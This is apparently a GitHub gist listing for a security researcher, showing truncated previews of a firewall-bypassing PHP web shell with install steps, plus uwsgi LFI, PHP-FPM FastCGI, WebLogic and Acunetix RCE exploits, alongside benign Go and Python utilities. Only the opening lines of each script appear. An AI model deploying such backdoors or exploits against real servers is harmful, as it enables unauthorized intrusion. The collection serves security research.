Ant Group is hiring long-term, across all areas of security

GaRY wofeiwo

@wofeiwo
wofeiwo / port_reuse.php
Last active July 26, 2023 22:17
Reuse Apache 80 port to spawn an interactive shell. Bypass the firewall.
<?php
//
// port_reuse.php
//
// Created by wofeiwo <wofeiwo@80sec.com> on 2011-08-27.
// Copyright 2011 80sec. All rights reserved.
// Reuse Apache 80 port to spawn a interactive shell. Bypass the firewall.
// Note: Only available on PHP >= 5.3.6 with mod_php on apache.
// Usage: 1. Put the script on htdocs.
// 2. Get interactive shell:
@wofeiwo
wofeiwo / gist:3634357
Created September 5, 2012 10:00
Golang daemonize
/* ivan(a.t)mysqlab.net */
package main
import (
"syscall"
"os"
"log"
)
func daemon(nochdir, noclose int) int {
@wofeiwo
wofeiwo / uwsgi_exp.py
Created August 10, 2017 10:30
Python uwsgi LFI exploit
#!/usr/bin/python
# coding: utf-8
# Author: wofeiwo@80sec.com
# Last modified: 2017-7-18
# Note: Just for research purpose
import sys
import socket
import argparse
import requests
@wofeiwo
wofeiwo / flup_fcgi_client.py
Created September 14, 2012 06:33
Python FCGI Client
#!/usr/bin/env python
# pylint: disable=W0622
# Copyright (c) 2006 Allan Saddi <allan@saddi.com>
# Copyright (c) 2011 Vladimir Rusinov <vladimir@greenmice.info>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
@wofeiwo
wofeiwo / fcgi_jailbreak.php
Created September 29, 2015 05:04
Jail break for PHP 5.3.3+ FASTCGI
<?php
/**
* PHP 5.3.3+ FASTCGI jailbreak
*
* @author wofeiwo <wofeiwo#80sec.com>
* @date 2013-01-23
* @version 1.0
* @reference https://bugs.php.net/bug.php?id=64103
* @reference http://www.wooyun.org/bugs/wooyun-2013-018116 (Chinese)
* @note disable php security settings, but can't overwrite disable_function/disable_classes.
@wofeiwo
wofeiwo / fcgi_exp.go
Created May 3, 2017 01:41
PHP-FPM Fastcgi Exploit
// PHP FactCGI remote exploit
// Date: 2012-09-15
// Author: wofeiwo@80sec.com
// Note: Just for research purpose
package main
import (
"./fcgiclient"
"fmt"
@wofeiwo
wofeiwo / Weblogic_WLS_exp.py
Created December 28, 2017 02:51
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def payload_command (command_in):
html_escape_table = {
"&": "&amp;",
'"': "&quot;",
@wofeiwo
wofeiwo / acu0day.py
Created December 29, 2017 02:57
Acunetix 0day RCE - (SYSTEM) Acunetix 0day RCE #Usage Run script with dzonerzy:dvm dzonerzy$ python /Users/dzonerzy/PycharmProjects/natbypass/acu0day.py 9999 172.16.24.1
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa
This PoC exploit 2 vulnerability in Acunetix core , the first one is a RCE (Remote Command Exec) and the second one is
a LPE (Local Privilege Escalation).
All credits for this exploit goes to Daniele Linguaglossa
"""
@wofeiwo
wofeiwo / fcgiclient.go
Created September 15, 2012 09:08
Golang FastCGI Client
// Copyright 2012 Junqing Tan <ivan@mysqlab.net> and The Go Authors
// Use of this source code is governed by a BSD-style
// Part of source code is from Go fcgi package
// Fix bug: Can't recive more than 1 record untill FCGI_END_REQUEST 2012-09-15
// By: wofeiwo
package fcgiclient
import (
@wofeiwo
wofeiwo / readLines-writeLines.go
Created April 2, 2013 04:41
read lines write lines like python api in golang
package main
import (
"io"
"os"
"bufio"
"bytes"
"fmt"
"strings"
)